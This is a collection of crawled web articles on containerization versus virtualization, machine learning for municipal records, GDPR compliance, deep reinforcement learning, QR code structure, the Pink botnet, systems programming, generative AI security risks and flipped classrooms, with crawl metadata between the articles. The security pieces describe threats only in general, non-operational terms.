from potential vulnerabilities in these older applications. Environments Needing Strong Isolation Virtualization also excels in environments where strong isolation between applications is critical. This is particularly useful in high-security environments, where a breach in one application should not be able to affect others. For instance, in a data center serving multiple organizations, virtualization can be used to isolate applications belonging to different users from each other. Even if one user’s application is compromised, the attacker would not be able to access applications running on other virtual machines. Infrastructure as a Service (IaaS) is a cloud computing model where resources like virtual machines, storage, and networks are provided as a service. Virtualization is a core technology behind IaaS. It allows cloud providers to efficiently utilize their hardware resources by running multiple VMs on the same physical hardware. Additionally, virtualization provides the flexibility to scale resources according to demand. If a client needs more resources, they can easily be allocated more virtual machines. Use Cases for Containerization Here are the main use cases for containerized applications: One of the main use cases for containerization is in microservices architectures. In a microservices architecture, an application is broken down into small, independent services that communicate with each other. This approach has many benefits, including improved scalability and easier maintenance. Containers are a perfect fit for microservices. They provide a standardized environment for each service, ensuring that they run consistently across different platforms. Additionally, containers are isolated from each other, which prevents conflicts between services or service instances. Continuous Integration/Continuous Deployment (CI/CD) is a software development practice where developers integrate their code into a shared repository frequently, usually several times a day. Each integration is then automatically tested and deployed. This approach allows teams to detect and fix problems early, resulting in higher quality software. Containerization plays a crucial role in CI/CD. Containers provide a consistent environment for testing, ensuring that tests are reliable and repeatable. Furthermore, containers can be easily deployed to production, making the deployment process faster and more efficient. Platform as a Service (PaaS) is a cloud computing model where a provider delivers a platform for developers to build, test, and deploy applications. This platform typically includes an operating system, middleware, and runtime environment. Containerization is an integral part of PaaS. It allows providers to efficiently utilize their resources by running multiple containers on the same host. Additionally, it provides a standardized environment for developers, making it easier for them to build and deploy applications. Related content: Read our guide to container DevOps The debate between containerization vs virtualization is not about which technology is better, but about which is more suitable for a particular use case. Virtualization is a great choice for running legacy applications, providing strong isolation, and in IaaS scenarios. On the other hand, containerization is ideal for microservices architectures, CI/CD, and PaaS scenarios. As we move into the future, it’s clear that both containerization and virtualization will continue to play a role in the IT and software development environment. By understanding their unique use cases and benefits, businesses can make informed decisions about which technology to adopt and how to best leverage them for their needs.
<urn:uuid:53cfd4d5-e891-48e8-a4df-9ae24dabb630>
CC-MAIN-2024-38
https://www.aquasec.com/cloud-native-academy/docker-container/containerization-vs-virtualization/
2024-09-15T09:58:43Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651622.79/warc/CC-MAIN-20240915084859-20240915114859-00596.warc.gz
en
0.93676
1,607
3.640625
4
Anyone in the records department for a municipality understands that preserving and accessing vital records cannot be overstated. Birth certificates, marriage licenses, death certificates, and other essential documents are the backbone of government operations and provide invaluable information to individuals and organizations. However, managing these records on paper can take time and effort. This is where machine learning steps in to revolutionize the way municipalities handle vital records. In this blog post, we will explore how machine learning technology makes digitizing vital records for cities easy and cost-effective. The Challenges of Traditional Record-Keeping Before delving into how machine learning is transforming the landscape, it’s essential to understand the challenges associated with traditional vital record keeping: Storing, organizing, and retrieving paper documents is a labor-intensive process prone to errors, misplacement, and loss. Paper records can be challenging to access remotely, hindering timely responses to inquiries and requests. Physical storage, personnel, and maintenance costs for paper records can strain municipal budgets. Protecting sensitive information in paper records can be challenging, making them vulnerable to unauthorized access or theft. Inefficient Search and Retrieval Searching through paper records is time-consuming and often yields incomplete results. How Machine Learning Addresses These Challenges Machine learning technologies, such as natural language processing (NLP), computer vision, and data extraction algorithms, are invaluable in overcoming traditional record-keeping systems’ limitations. Here’s how: Machine learning algorithms can analyze and extract data from paper records swiftly and accurately. This reduces the need for manual data entry, minimizing errors and saving time. Digital records can be accessed remotely, enabling municipalities to respond to requests more efficiently. This accessibility also facilitates disaster recovery and backup processes. Once records are digitized, the ongoing physical storage and maintenance costs are significantly reduced. Additionally, machine learning tools become more cost-effective as technology advances. Digital records can be encrypted, protected with access controls, and backed up securely, reducing the risk of data breaches and ensuring compliance with privacy regulations. Machine learning-powered search algorithms can quickly locate specific records, even if they contain handwritten text. This boosts efficiency and accuracy in record retrieval. Machine learning’s impact on digitizing vital records is not theoretical; it’s already used across many municipalities. Indeed, iTech uses it to extract and make data searchable and accessible for citizens of multiple cities. Historical RecordsOld, fragile records can be digitized without compromising their integrity, ensuring that valuable historical data is preserved for future generations. with Other SystemsMachine learning can facilitate the integration of vital records with other government systems, streamlining administrative processes. By automating data extraction, enhancing accessibility, and improving data security, iTech, using machine learning, is helping governments streamline their operations, better serve their citizens, and preserve important historical records. At iTech, we help cities, towns, and other municipalities make the most of their data with the right technology for each municipality’s unique needs. This may entail OCR with machine learning technology, cloud data storage solutions, and beyond. At iTech, our team has the experience and technology to help you achieve your vital records retrieval challenges. We invite you to contact us today to discuss your municipality’s vital records storage situation.
<urn:uuid:a6cfbbea-47ab-470a-849c-7817b3fdc832>
CC-MAIN-2024-38
https://itechdata.ai/machine-learning-makes-digitizing-vital-records-for-municipalities-easy-and-cost-effective/
2024-09-19T04:53:04Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651981.99/warc/CC-MAIN-20240919025412-20240919055412-00296.warc.gz
en
0.911498
677
2.984375
3
What is GDPR? The General Data Protection Regulation, or GDPR, is a regulation that requires businesses to protect data and privacy in the European Union (EU) and the European Economic Area (EEA). The GDPR protects European citizens and residents from data misuse and abuse as well as careless data practices. It is the answer to the call for companies to be more transparent and accountable in their data practices. It covers every aspect of working with information – from data capture to data erasure. The GDPR concerns itself with accountability, transparency, and fairness. At the heart of the law is data minimization. In other words, you shouldn’t be collecting, using, or storing data that you don’t have a use for. And you definitely shouldn’t do those things if you don’t have consent from the data subject. why GDPR was introduced In today’s digital world, a frightening amount of personal information—banking information, contact lists, our IP address, documents, and social media feeds—is available online. Have we, as consumers, ever wondered how this data is collected, stored, and used? This is why in May 2018, a European privacy regulation called GDPR became mandatory for all businesses dealing with European citizens. As an automated data entry services provider and a GDPR compliant firm, iTech briefly explains all you need to know about GDPR. Are all companies GDPR compliant yet? Dell and Dimension Research came out with surprising facts from their survey of 800 professionals responsible for data protection. It found that 80 percent of those surveyed have little or no idea of what is involved in the GDPR. Months after it became mandatory, 1 in 4 companies still has to work on becoming GDPR compliant. And it is not just smaller businesses but even many tech companies that are trailing in this. It is time to do a fast catch-up if you don’t want to pay hefty amounts. Many companies beyond Europe, particularly in America as well as Asia, are setting up compliance programs. Whatever be your industry and wherever your location is, here is a summarization of what GDPR is and how it can impact your business and tips to get compliant. Does GDPR Apply to You? The GDPR applies to you if you collect data from EU citizens or residents, whom the law protects. Even if you are not based in the EU nor pay taxes in an EU member state, you must still comply with the GDPR as long as you presently collector continue to store data from EU data subjects. If you don’t wish to go through the compliance process, then you’ll need to block access to your site in the EU to avoid inadvertently collecting EU data. Whether or not you need to comply, consider doing so anyway. Many of the GDPR principles are good business practice, and today’s internet users expect and demand a greater degree of privacy whether or not it’s the law. Why businesses must get GDPR compliant? Companies will have to review all their business processes and overhaul their sign-up forms. For example, if you send a newsletter, you will have to prove that the customer explicitly opted for it. A blanket acceptance will no longer hold good for all user engagement. Also, businesses cannot deny customer service, such as making a website inaccessible because they did not accept the capture of their personal details. What are the 8 GDPR Rights of Individuals? - The right to request access to personal data and know-how business is using it. - The right to be forgotten is the right to withdraw consent and have their information deleted anytime. The responsibility is solely on the business to remove the data from all parties in the custody chain. - The right to transfer allows the business to transfer data from one provider to another. - The right to be informed is where the user knows before any data is collected. - The right to know when the data is collected, and the user has full authority to update the information at any time. - Individuals also have the right to restrict their data from being shared. - They have the right to stop the data from being used for any direct marketing activity. - And most important of all. For any data breach, inform the users within 72 hours of the company becoming aware of it. This makes it vital for businesses to implement security checks at every level and implement a notification system as we GDPR and Data Capture On May 25, 2018, the new General Data Protection Regulation or GDPR came into effect. GDPR applies to all businesses that sell to citizens in Europe. It also includes all technical processing companies that process the information on the seller’s behalf. What GDPR means is that customers have more control over their personal data. This data relates to anything about a person: name, photo, email address, bank details, location details, medical information, or computer IP. This will have a far-reaching impact on businesses when it comes to customer engagement. We no longer use the old opt-out process or implicit consent; we have already seen it with Facebook. The social media giant has had to switch to an opt-in consent process. Under the law’s eyes, inaction on the user’s part cannot imply that they consent to their data capture. The most tangible impact of the GDPR for businesses tends to be in how their consent mechanisms change. You can’t capture data without a legal basis. One of those legal bases is consent. However, consent isn’t implied – you have to prove it. Article 7 of the GDPR covers the “conditions for consent.” Essentially, you need to be able to: - Prove the data subject consented - Demonstrate the consent provided was written, easily accessible, and written in clear and plain language - Offer the right for the subject to withdraw their consent whenever they want - Make it easy to withdraw consent - Ensure consent isn’t a condition for accessing your business In other words, the customer needs to know they consent to data processing, and you can’t ban them from their site if they don’t consent to the processing. Getting consent once isn’t enough. If you change the way you process the data, you need to seek consent for that. One consent doesn’t cover all conditions. If any of your data processing activities change, you need to update your data subjects and likely ask for consent again. Meeting the Conditions What do those consent conditions look like in practice? It means requesting a “clear, affirmative act establishing a freely given, specific, informed and unambiguous indication of the data subject’s agreement to the processing.” When you seek affirmative consent (such as ticking a box), you’ll need to share details like: - How you process the data - Why you process the data - How to revoke consent - Whether you share the data with third parties - Whether the data leaves the EU - How long you store data Additionally, all the information you provide needs to be written in clear language that anyone can read. That means writing to the reading level of your average user, choosing a readable font, and organizing your privacy statement well. Trying to mask your data practices in legalese or “fine print” can earn you a stern call from your local data protection office. Taken too far, you’ll be named, shamed, and fined. Data Capture in the Age of the Right to Be Forgotten The ability to freely and easily withdraw consent is an important part of data capture and data entry (If you aren’t sure about difference between data capture and data entry, check this article) The EU says that it should be as easy for data subjects to revoke their consent as it is to provide it. As well as showing data subjects how to withdraw consent for processing, companies must now abide by the “right to be forgotten principle.” The right to be forgotten is one of the data subjects’ rights. Outlined in Article 17, it says that data subjects may request the erasure of their data in specific circumstances. They may request to be ‘forgotten’ when: - You no longer need their personal data for the original collection purpose - They withdraw the consent to the processing and you must comply - You processed their data unlawfully - You must erase it to comply with a law In these cases, you have an obligation to delete their data “without undue delay.” GDPR Compliance Isn’t Optional As of May 25, 2018, you must either GDPR comply or block access to your site. Companies that continue to ignore the new rules or provide woefully inadequate solutions face serious fines. The EU could come for two to four percent of your total global turnover. Google recently paid a $57 million fine after the French data protection regulator ruled that Google didn’t work hard enough to get consent from users. Part of upholding the GDPR means working with GDPR-compliant solutions providers. Get in touch today to learn how we can keep your data capture compliant. Penalties for GDPR violations The General Data Protection Regulation (GDPR) Bill intends to build trust between consumers and businesses handling their personal data. Any violation can attract hefty penalties both on the data controllers as well as the data processors. Of severe breaches, fines can go up to 20 million euros or 4 percent of global turnover, whichever is higher. The amount of penalty varies based on factors such as the steps taken to be GDPR compliant, the severity of the data breach, the mechanism in place to prevent a data breach, etc. Recognizing the importance of GDPR, iTech all the required steps to be compliant in all our services—data entry outsourcing services, freight audit services, medical insurance verification, and more. Contact us! For secure data services.
<urn:uuid:91aea6b2-14f2-4f72-a7fb-6cf9ee84a09e>
CC-MAIN-2024-38
https://itechdata.ai/what-is-gdpr-and-how-does-it-impact-data-capture/
2024-09-19T03:13:09Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651981.99/warc/CC-MAIN-20240919025412-20240919055412-00296.warc.gz
en
0.944978
2,082
2.8125
3
Adjoining reinforcement learning and deep learning form the new term Deep Reinforcement Learning (RL). Deep reinforcement learning is a subpart of machine learning (ML) and artificial intelligence (AI), where intelligent machines learn from their actions just the way humans learn from their past experiences. The DRL (deep reinforcement learning) algorithm works on a trial and error basis. There are two different forms of deep reinforcement learning – supervised and unsupervised ML. For supervised learning, a machine calculates the label to use for complex inputs, while for unsupervised learning, a system of group-related items is used to improve outcomes. Reinforcement learning can help to achieve the best possible results as it possesses the capability of predicting actions. Working of deep reinforcement learning A continuous form of data is fed into the machine. Unlike other ordinary ML-enabled systems, this type of learning is reinforced. The reinforcement learning process (RL) involves training software agents to learn to carry ideal behavior within the particular environment to help achieve optimized results. While undergoing reinforcement learning, an agent is rewarded for any positive behavior (to encourage such actions) and punished for any negative behavior (to discourage such action). Ultimately, an agent can learn the desired behavior that maximizes the total reward. Such a pattern of deep reinforcement learning makes it most applicable in dynamic environments. The concept of reinforcement learning came into existence even before AI came into force. Its combination with deep learning paved the way for tech experts to achieve excellent results. In the term deep reinforcement learning, the word “deep” refers to several layers of artificial neural network replicating the human brain’s structure. Moreover, it is a fast-moving field applied in various spheres to escalate processes and maximize outputs. How deep reinforcement learning benefits businesses? Let’s learn how deep reinforcement learning can prove helpful for businesses in different fields – Robots in factory Consider the task of boxing a product and adding it into a larger container. Robots can perform this task with great speed and accuracy by training themselves. Here, robots use deep reinforcement learning, where they are trained to learn and perform a new task. While performing a particular task, robots make sure to capture the video footage of the process. Here whether the tasks succeed or fail, it memorizes the action and acquires knowledge as part of the deep learning model controlling the robot’s actions. A Japanese company named Fanuc created an industrial robot that is intelligent enough to train itself to perform a particular task. Optimization of space management in warehouses Warehouse managers often face challenges in looking for the best solutions while optimizing space utilization. The abundant amount of inventory, fluctuating demands for stocks, and slow replenishing merchandise rates are factors that a manager needs to take care of before accumulating items in a warehouse. The reinforcement learning algorithms help reduce transit time for stocking and retrieving products in the warehouse, even optimizing space utilization and warehouse operations. Adjusting pricing depending on supply and demand helps maximize revenue from possible products by using dynamic pricing. A technique called Q-learning techniques is used to find a solution for a dynamic pricing problem. Reinforcement learning algorithms help businesses to optimize pricing during interactions with customers. A manufacturer who wants to deliver products for customers using a fleet of trucks is set to serve customer demand. The manufacturer can use Split Delivery Vehicle Routing Problem to make split deliveries and realize savings in the process. The manufacturer’s prime objective is to reduce total fleet cost while meeting all demands of the customers. Introducing a multi-agent system helps agents to communicate and co-operate with one another through reinforcement learning. The advantage of using Q-learning to serve appropriate customers with just one vehicle proves helpful for the manufacturer. The manufacturer reaps benefits by improving execution time and reducing the number of trucks used to meet customers’ demands. Personalization is the need of the time, especially when it comes to the shopping experience. Retailers and e-commerce merchants enhance customer purchasing habits and have shown an absolute imperative to map communications and promotions through personalization. Personalization in such cases helps retailers to promote relevant shopping experiences to attain customer attention. E-commerce merchants can learn and analyze customer behaviors and tailor products and services to suit customer interests using reinforcement learning algorithms. In the medical industry As a medical research subject, a dynamic treatment regime (DTR) is used for setting rules in finding effective treatments for patients. An illness like cancer demands treatment for a longer period where drugs and treatment levels need to be administered for a particular time. Reinforcement learning helps address the DTR problem where RI algorithms can process clinical data to develop a treatment strategy, using various clinical indicators collected from patients as inputs. Humans are searching for different ways to make the machine perform human tasks, and emerging technologies have even made it possible. Even though there is a significant difference between the idea and reality, reinforcement learning has driven hope by making robots and machines perform tasks that were not possible at one time. Considering it just the beginning, it plays a major part as an innovative technology that can drive business value. To learn more on artificial intelligence technology and reinforcement technology, visit our latest whitepapers on artificial intelligence technology.
<urn:uuid:f5c58da0-364b-40df-aa8e-fd2d4f1d5152>
CC-MAIN-2024-38
https://www.ai-demand.com/insights/tech/artificial-intelligence/deep-reinforcement-learning-a-new-form-of-learning/
2024-09-13T01:30:19Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651506.7/warc/CC-MAIN-20240913002450-20240913032450-00896.warc.gz
en
0.92866
1,060
4.15625
4
QR Code – Quick Recognition Code. A QR code is a type of barcode that can be read by a digital device and which stores information as a series of pixels in a square-shaped grid. Standard barcodes can only be read in one direction – top to bottom and store a small amount of information, usually in an alphanumeric format. A QR code is read in two directions – top to bottom and right to left, and can store significantly more data. A QR reader can identify a standard QR code based on the three large squares outside the QR code. Once it has identified these three shapes, it knows that everything contained inside the square is a QR code. The QR reader then analyzes the QR code by breaking the whole thing down to a grid. It looks at the individual grid squares and assigns each one a value based on whether it is black or white. It then groups grid squares to create larger patterns. A standard QR code is identifiable based on six components: - Quiet Zone – This is the empty white border around the outside of a QR code. Without this border, a QR reader will not be able to determine what is and is not contained within the QR code (due to interference from outside elements). - Finder pattern – QR codes usually contain three black squares in the bottom left, top left, and top right corners. These squares tell a QR reader that it is looking at a QR code and where the outside boundaries of the code lie. - Alignment pattern – This is another smaller square contained somewhere near the bottom right corner. It ensures that the QR code can be read, even if it is skewed or at an angle. - Timing pattern – This is an L-shaped line that runs between the three squares in the finder pattern. The timing pattern helps the reader identify individual squares within the whole code and makes it possible for a damaged QR code to be read. - Version information – This is a small field of information contained near the top–right finder pattern cell. This identifies which version of the QR code is being read (see “Types of QR code” below). - Data cells – The rest of the QR code communicates the actual information, i.e., the URL, phone number, or message it contains. There are four widely accepted versions of QR codes. The version used determines how data can be stored and is called the “input mode.” It can be either numeric, alphanumeric, binary, or kanji. The type of mode is communicated via the version information field in the QR code. - Numeric mode – This is for decimal digits 0 through 9. Numeric mode is the most effective storage mode, with up to 7,089 characters available. - Alphanumeric mode – This is for decimal digitals 0 through 9, plus uppercase letters A through Z, and symbols $, %, *, +, –, ., /, and : as well as a space. It allows up to 4,296 characters to be stored. - Byte mode- This is for characters from the ISO–8859–1 character set. It allows 2,953 characters to be stored. - Kanji mode – This is for double–byte characters from the Shift JIS character set and used to encode characters in Japanese. This is the original mode, first developed by Denso Wave. However, it has since become the least effective, with only 1,817 characters available for storage. A second kanji mode called Extended Channel Interpretation (ECI) mode can specify the kanji character set UTF–8. However, some newer QR code readers will not be able to read this character set. There are two additional modes which are modifications of the other types: - Structured Append mode – This encodes data across multiple QR codes, allowing up to 16 QR codes to be read simultaneously. - FNC1 mode – This allows a QR code to function as a GS1 barcode. [Thanks to Kaspersky for this information.]
<urn:uuid:d1929659-19c5-4063-b5a7-243cdb599124>
CC-MAIN-2024-38
https://blocksandfiles.com/2022/11/23/qr-code/
2024-09-15T12:58:23Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651630.14/warc/CC-MAIN-20240915120545-20240915150545-00696.warc.gz
en
0.906955
836
4.03125
4
The European Union’s General Data Protection Regulation (GDPR) is a regulation designed to protect an individual’s personal data. In addition to giving citizens control of their personal data, the GDPR also aims to unify data protection laws across the European Union (EU). The GDPR entered into force on 24 May 2016. Enforcement began on 25 May 2018. The regulation applies to any organisation processing the data of an EU citizen, even if the organisation is based outside the EU. Organisations worldwide therefore have to ensure that their data processing activities comply with the requirements of the GDPR. A note for UK-based individuals and organisations: Although the UK has left the EU, the UK Government has incorporated the provisions of the GDPR into domestic legislation as the UK GDPR. This means that the rules in this guide continue to apply equally in the UK. When it was introduced, the reform was the toughest data protection law in the world. Non-compliant organisations face fines of up to 4% of annual revenue or €20 million, whichever is greater. These penalties can seriously harm organisations of any size, highlighting the importance of undertaking the reforms required to be compliant with the regulation. Companies or organisational departments specialising in data management need to pay particular attention to the requirements of the GDPR. There are likely to be multiple internal and external stakeholders involved in data collection, management and transmission. In particular, each stakeholders’s role – and hence their responsibilities – must be defined. For instance, in our data integration work, we are classified as a “Data Processor”. The head office client on whose behalf we collect data (e.g. a car manufacturer) is a “Data Controller”, and the third parties whose data we collect (e.g. a car dealership) is a “Data Provider”. Each needs to comply – and demonstrate that compliance – with the principles of the GDPR regulation. To comply with the GDPR principles, organisations will need to ensure that all personal data is: - Processed lawfully, fairly and in a transparent manner - Collected for specified, explicit and legitimate purposes - Adequate, relevant and limited to what is necessary in relation to the purposes - Accurate and kept up-to-date - Kept for no longer than necessary - Processed in a manner that ensures appropriate security. We have devised a step-by-step checklist that’s relevant to both Data Processors and Data Controllers. Our consultants use it to ensure that each one of our data management projects complies with our responsibilities as a Data Processor. The checklist can be downloaded for free using the form below, but please be aware that the information is provided for your help and guidance and does not constitute legal advice. The information has been taken from various publications of the Information Commissioner’s Office; while every effort has been taken to ensure that the information is correct it should be noted that this document is intended as a guide only. For further information please go to www.ico.org.uk. Download the checklist here
<urn:uuid:8cd66d85-312d-40e8-abf6-8102647d2037>
CC-MAIN-2024-38
https://etlsolutions.com/gdpr-checklist-for-data-management-projects/
2024-09-15T12:07:26Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651630.14/warc/CC-MAIN-20240915120545-20240915150545-00696.warc.gz
en
0.9284
638
2.59375
3
Cybersecurity researchers have uncovered a cyber attack campaign recently that was existing in the wild from the past six years. And reports are in that the plan was to infect millions of devices in China with Pink Botnet Malware and to prepare them in such a way that they can be used to launch distributed denial of service (DDoS) attacks or to send spam content. Qihoo 360, a Chinese internet security company, was the firm behind the discovery of the above stated attack and its Netlab security team has confirmed that the hackers behind the campaign infected over 1.6 million devices so far. Pink Malware basically infects MIPS loaded routers and takes control of the device and projects it as a botnet. That can be later used by the threat actors to send spam, launch Ddos attacks disrupting corporate networks in the west. NSFocus, a Beijing based security company confirmed the existence of Zombie nodes loaded Pink Botnet malware in its latest independent report and stated that the cyber criminals behind the incident could have taken the advantage of zero-day vulnerabilities in network gateway devices to infect the devices to form a super large-scale bot network. What is a botnet? A botnet is a network of malware infected computing devices either controlled by single or multiple parties through a centralized server controlled by a hacker/s. They are usually used to send spam, launch denial of service attacks, siphon data and allow an attacker to conduct ad frauds.
<urn:uuid:e358edc7-95b2-4adb-83e0-38bf41a6386a>
CC-MAIN-2024-38
https://www.cybersecurity-insiders.com/ddos-attacks-through-1-6-million-infected-pink-botnet-malware-devices/
2024-09-08T10:46:10Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700650976.41/warc/CC-MAIN-20240908083737-20240908113737-00496.warc.gz
en
0.958179
296
2.796875
3
If you’re visiting this page, then it’s safe to assume you have some appreciation for how complex the technology sector is. IT is a complicated beast in part due to the fact that it’s constantly evolving and each new advancement is an added layer of complexity on top of an already impossible number of pre-existing layers. We employ BMC Blogs as a means of peeling back some of these layers to offer deep insights and brief overviews alike—ideally exposing the IT world in a way that allows newcomers and veterans to understand it. Today, we thought we’d talk about a more basic concept in a way that clears up at least some of the confusion surrounding software development. The topic for today, as I’m sure you guessed by reading the title of this post, is systems programming. But before we talk about what systems programming is, we should first address what a system even is within this context. What is a System? The dictionary definition of a system is “a set of things working together as parts of a mechanism or an interconnecting network.” This is a pretty apt way of thinking about systems as they pertain specifically to the IT world. A computer system is a collection of components (both hardware and software) that function as a part of a whole. A system is comprised of five primary elements: architecture, modules, components, interfaces, and data: Architecture is the conceptual model that defines the system structure and behavior. This is often represented graphically through the use of flowcharts that illustrate how the processes work and how each component is related to one another. Modules are pieces (hardware or software) of a system that handle specific tasks within it. Each module has a defined role that details exactly what its purpose is. Components are groups of modules that perform related functions. Components are like micro-systems within the system at large. Using components and modules in this way is called modular design, and it’s what allows systems to reuse certain pieces or have them removed and replaced without crippling the system. Each component can function on its own and can be interchanged or placed into new systems. Interfaces encompass two separate entities: user interfaces and system interfaces. User interface (UI) design defines the way information is presented to users and how they interact with the system. System interface design deals with how the components interact with one another and with other systems. Data is the information used and outputted by the system. System designers dictate what data is pertinent for each component within the system and decide how it will be handled. Each component complements the system in its own way to keep everything functioning properly. If one piece of the puzzle becomes askew, the entire system can be impacted. Because technology is constantly evolving, components are modified, added, or removed on a constant basis. To make sure these modifications have the desired effect, systems design is used to orchestrate the whole affair. What is Systems Design? Systems design involves defining each element of a system and how each component fits into the system architecture. System designers focus on top-level concepts for how each component should be incorporated into the final product. They accomplish this primarily through the use of Unified Modeling Language (UML) and flow charts that give a graphical overview of how each component is linked within the system. Systems design has three main areas: architectural design, logical design, and physical design. The architectural design deals with the structure of the system and how each component behaves within it. Logical design deals with abstract representations of data flow (inputs and outputs within the system). Physical design deals with the actual inputs and outputs. The physical design establishes specific requirements on the components of the system, such as input requirements, output requirements, storage requirements, processing requirements, and system backup and recovery protocols. Another way of expressing this is to say that physical design deals with user interface design, data design, and process design. Systems designers operate within key design principles when they are creating the system architecture. Some of the key tenets of good system design are: - Be Explicit – All assumptions should be expressed. - Design for Iteration – Good design takes time, and nothing is ever perfect the first time. - Keep Digging – Complex systems fail for complex reasons. - Be Open – Comments and feedback will improve the system. The systems programmers are the ones responsible for executing on the vision of the system designers. What is Systems Programming? Systems programming involves the development of the individual pieces of software that allow the entire system to function as a single unit. Systems programming involves many layers such as the operating system (OS), firmware, and the development environment. In more recent years, the lines between systems programming and software programming have blurred. One of the core areas that differentiates a systems programmer from a software programmer is that systems programmers deal with the management of system resources. Software programmers operate within the constraints placed upon them by the system programmers. This distinction holds value because systems programming deals with “low-level” programming. Systems programming works more closely with computer resources and machine languages whereas software programming is primarily interested in user interactions. Both types of programming are ultimately attempting to provide users with the best possible experience, but systems programmers focus on delivering a better experience by reducing load times or improving efficiency of operations. It’s imperative that everyone working within the system is aligned. The primary goal of any service or product is to deliver value to your customers. Whether you are involved with top-level user interactions or low-level system infrastructure, the end goal remains the same. This is why a company culture that supports teamwork and goal-alignment is so important for technology companies. Modern customers have increasingly high expectations. As such, organizations must constantly be seeking ways to improve their output to provide customers with an ever-improving product. Achieving this is done through intelligent systems design and an agile approach to development. Bringing everyone together to work towards a singular goal is the main pursuit of the DevOps approach to software development.
<urn:uuid:d943b15d-409c-488c-a0f3-31747bb60819>
CC-MAIN-2024-38
https://blogs.bmc.com/systems-programming/
2024-09-09T15:33:56Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651103.13/warc/CC-MAIN-20240909134831-20240909164831-00396.warc.gz
en
0.93721
1,255
3.546875
4
Artificial Intelligence is already affecting many aspects of our lives—and has been for decades. For better or worse, that’s going to continue. But as AI becomes more powerful and more deeply woven into the structure of our daily reality, it is critical for organizations to realistically assess its full potential as both tool and threat. AI enables both good and bad actors to work faster at scale The prevalence of machine learning in business makes it an appealing tool and target The hype surrounding AI has the potential to obscure the risks The scope of emerging threats is enormous and varied New AI-driven security approaches will be required to combat AI-generated threats. Part of the problem of predicting the real implications of generative AI technology is the massive, buzzy cloud of hype that surrounds it. Even the term itself has become something of a cliché. Want to fill an auditorium at a technology event? Put AI in the title of your presentation. Want to draw attention to a machine learning feature in your software? Market it as “AI.” This has the unfortunate effect of obscuring the reality of the technology—sensationalizing benefits and dangers while simultaneously anesthetizing many to the topic as a whole. This is compounded by the fact that many—especially the less technical—don’t really understand what, exactly, AI is. In simple terms, artificial intelligence is exactly what it sounds like: the use of computer systems to simulate human intelligence processes. Examples: language processing, speech recognition, expert systems, and machine vision. Computer systems governed by algorithms that enable them to learn and adapt automatically after they have been trained on a data set. Examples: Content recommendation algorithms, predictive analysis, image recognition A technique of machine learning that uses layers of algorithms and computing units to simulate a neural network like the human brain. Examples: Large Language Models, Translation, Facial recognition Phishing with dynamite Generative AI has the ability to create highly realistic copies of original content. Not only does this present potential intellectual property risks for organizations using AI for content generation, but it also allows bad actors to steal and realistically copy all sorts of data to either pass off as an original creation or to facilitate other attacks. Generative AI can create ultra-realistic imagery and video in seconds, and even alter live video as it is generated. This can erode confidence in a variety of vital systems—from facial recognition software to video evidence in the legal system to political misinformation—and undermine trust in virtually all forms of visual identity. Phishing with dynamite Attackers can use generative AI tools to realistically simulate faces, voices, and written tone, as well as emulate corporate or brand identity which can then be leveraged for highly effective and difficult to detect phishing attacks. Because many organizations are using off-the-shelf generative AI models, they are potentially exposing information used to train or give prompts to their instance to injection attacks refined by attackers to target popular models. Without stringent safeguards in place and frequent updates, an exploit for the base model could expose any organization using that model. While AI can generally produce convincing speech or text at speed, isn’t always accurate. This is particularly problematic for organizations relying on AI to generate informational or support content for users, as well as for organizations using machine learning for threat detection, where an anomalous result could be especially costly. Because AI is able to write functional code with superhuman speed, it could potentially be used to scale attacks with unprecedented speed and complexity. In addition, AI could be used to detect vulnerabilities in a compromised code base and could expand the scope of attackers by lowering the barrier of entry. While popular LLMs have some safeguards against users creating malicious code, sophisticated attackers can find exploits and loopholes. Stolen or copied models can also be stripped of such safeguards, allowing bad actors to rapidly generate nearly undetectable, highly customizable exploits. Attacks don’t necessarily need to exploit the AI itself. Instead, they could target the data used to train a machine learning model in order to false output. This could then be further leveraged to create exploits within the model itself—such as falsifying a DNA sequence in a criminal database—or simply to produce results that could damage the targeted organization. AI that is trained with or handles sensitive data could potentially expose that data, whether through a bug, as has happened with several of the major commercial models, or through a targeted attack. We asked ChatGPT to lay out the top threats posed by generative AI. Here was its response: Generative AI, while offering incredible potential for innovation and creativity, also presents unique challenges and threats in the realm of cybersecurity. Here are some key points to consider: The features that make AI a useful tool for bad actors can—and must—be used to harden cybersecurity measures. Not only will this allow organizations to develop more effective and agile cybersecurity technologies, but better address human vulnerabilities as well.
<urn:uuid:a64ac431-98e8-4e11-8780-d39a74c84071>
CC-MAIN-2024-38
https://www.digicert.com/insights/artificial-intelligence
2024-09-09T16:07:02Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651103.13/warc/CC-MAIN-20240909134831-20240909164831-00396.warc.gz
en
0.937272
1,021
3.0625
3
2012 was a big year for technology in education, and as promised, I’ll be diving into 5 of the top tech trends in education that are sure to take 2013 by storm! One of the biggest trends I hear teachers and administrators talking about is the Flipped Classroom. While this isn’t a new concept, it certainly became much more prominent trend over the last couple years. A high school biology teacher in Los Gatos, California is using the power of video to implement a Flipped Classroom and transform his students’ learning environment. As Renee Patton points out in her blog post, it’s not all about the technology, but when implemented with sound pedagogy the technology can have a profound impact on student engagement and learning. At ISTE 2012 this last year, we caught up with flipped learning pioneers, Jonathan Bergmann and Aaron Sams, to discuss how the Flipped Classroom allows for greater personalized interaction that is vital to a student’s success. Bergmann and Sams, authors of Flip Your Classroom: Reach Every Student in Every Class Every Day, point out that one of the greatest benefits of flipping is the increase in overall interaction – both teacher to student and student to student. This month, we will be attending the Federal Education Technology Conference, January 28 – 31 in Orlando, Florida where our very own experts, Greg Mathison and Lance Ford, will present “Flipped and Blended Learning: Enabling Students to Learn from Home or Any Location” on Tuesday from 1 – 3 p.m. They will discuss how educators can use low-cost technologies to provide live and recorded lessons to students in any location, on any device, at any time, helping level the playing field and boosting student learning. Got your own stories about flipping the classroom or planning to attend FETC 2013? We’d love to hear your side of ‘the flip’.
<urn:uuid:fbca9a35-8e51-458d-82c1-76913bbb6cc1>
CC-MAIN-2024-38
